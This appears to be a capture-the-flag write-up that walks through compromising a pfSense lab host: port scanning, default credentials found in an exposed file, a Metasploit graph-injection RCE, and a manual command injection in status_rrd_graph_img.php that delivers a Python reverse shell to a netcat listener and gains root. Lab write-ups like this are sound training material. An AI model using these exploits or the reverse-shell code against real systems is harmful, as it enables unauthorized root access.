Nmap discovered 2 open ports for http and ssl.
ORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.35 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: lighttpd/1.4.35 |_http-title: Did not follow redirect to https://10.10.10.60/ 443/tcp open ssl/https? | ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US | Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2017-10-14T19:21:35 | Not valid after: 2023-04-06T19:21:35 | MD5: 65f8 b00f 57d2 3468 2c52 0f44 8110 c622 |_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02 |_ssl-date: TLS randomness does not represent time
First, let’s add the host to hosts file, and go to the web application.
Apparently, the certificate is weird and the browser does not let me make an exception. So instead, let’s go to the application with just the IP in the URI:
Ok, going to the application with the IP works fine and a login form appears.
I have tried some default passwords and SQLi err check, with no success:
Wikipedia Info on PFSENSE
pfSense is a firewall / computer software distribution based on FreeBSD.
# searchsploit pfsense Exploit | Path <deleted XSS and CSRF exploits> pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit) | unix/remote/43193.rb pfSense 2.3.1_1 - Command Execution | php/webapps/43128.txt Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
- metasploit module RCE – requires authenticated user
- python exploit command injection, reverse shel – requires auth
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. This script will return a reverse shell on specified listener address and port. Ensure you have started a listener to catch the shell before running!“
Metasploit exploit modules
msf6 > search pfsense Matching Modules ================ # Name Disclosure Date Rank Check Description ------------------------------------------------------------------------------------------------------------------------------------------ 0 exploit/unix/http/pfsense_clickjacking 2017-11-21 normal No Clickjacking Vulnerability In CSRF Error Page pfSense 1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE 2 exploit/unix/http/pfsense_group_member_exec 2017-11-06 excellent Yes pfSense authenticated group member RCE
Dirbuster did not find a single file or directory on port 80 (probably because of redirect/firewall rules). However, that is not the case for port 443.
The files system-users.txt, changelog.txt seem interesting. Let’s check them.
####Support ticket### Please create the following user username: Rohit password: company defaults
We have a user Rohit with default credentials for pfsense.
According to NetgateDocs the default credentials for pfsense software are admin:pfsense so in our case should be rohit:pfsense
# Security Changelog ### Issue There was a failure in updating the firewall. Manual patching is therefore required ### Mitigated 2 of 3 vulnerabilities have been patched. ### Timeline The remaining patches will be installed during the next maintenance window
Apparently there have been 3 vulnerabilities, 2 of which are patched and 1 still available.
Let’s login with the obtained credentials (rohit:pfsense). There are multiple dropboxes in the interface, however only under status we have additional functionalities.
During our enumeration phase we discovered multiple xploits, information about the fact that there is an unpatched vulnerability and we have credentials. Some of the identified exploits require authentication – we should try them first.
1 exploit/unix/http/pfsense_graph_injection_exec 2016-04-18 excellent No pfSense authenticated graph status RCE
Pbtaining a meterpreter from metasploit module pfsense_graph_injection_exec.
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit [*] Started reverse TCP handler on 10.10.14.5:4444 [*] Detected pfSense 2.1.3-RELEASE, uploading intial payload [*] Payload uploaded successfully, executing [*] Sending stage (39282 bytes) to 10.10.10.60 [+] Deleted KIXxVsv [*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.60:15059) at 2021-04-14 09:43:38 -0400 meterpreter > shell Process 97206 created. Channel 0 created. id uid=0(root) gid=0(wheel) groups=0(wheel)
We know there is a command injection vulnerability somewhere. While googling more on that I’ve found the following post describing the command injection in status_rrd_graph_img.php in detail.
Within RRD GRAPHS is found the required php file whis is needed for this to work. Making a request from within the page with burp displays the following information:
GET /status_rrd_graph_img.php?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse&graph=eight_hour HTTP/1.1 Host: 10.10.10.60 Connection: close sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://10.10.10.60/status_rrd_graph.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4dbcd8342e5f415d50a83af577962a2e; cookie_test=1618413161
We’re interested in invoking queues database and inject our commands right after it:
Unfortunately the response is in gibberish which we don’t speak. A neat little trick is to pipe the response to netcat therefore making it readable like so:
# nc -nvlp 3333 listening on [any] 3333 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 59699 CMD INJECT
In order for us to open a reverse shell we have to feed the request with our own python script from the said python exploit.
$ cat pipe-reverse.py import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.5",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); # nc -nvlp 3333 < pipe-reverse.py listening on [any] 3333 ... $ nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 20248 sh: can't access tty; job control turned off # # id uid=0(root) gid=0(wheel) groups=0(wheel)
There might be need to press “cancel” request on burp in order to activate the python script for the reverse shell.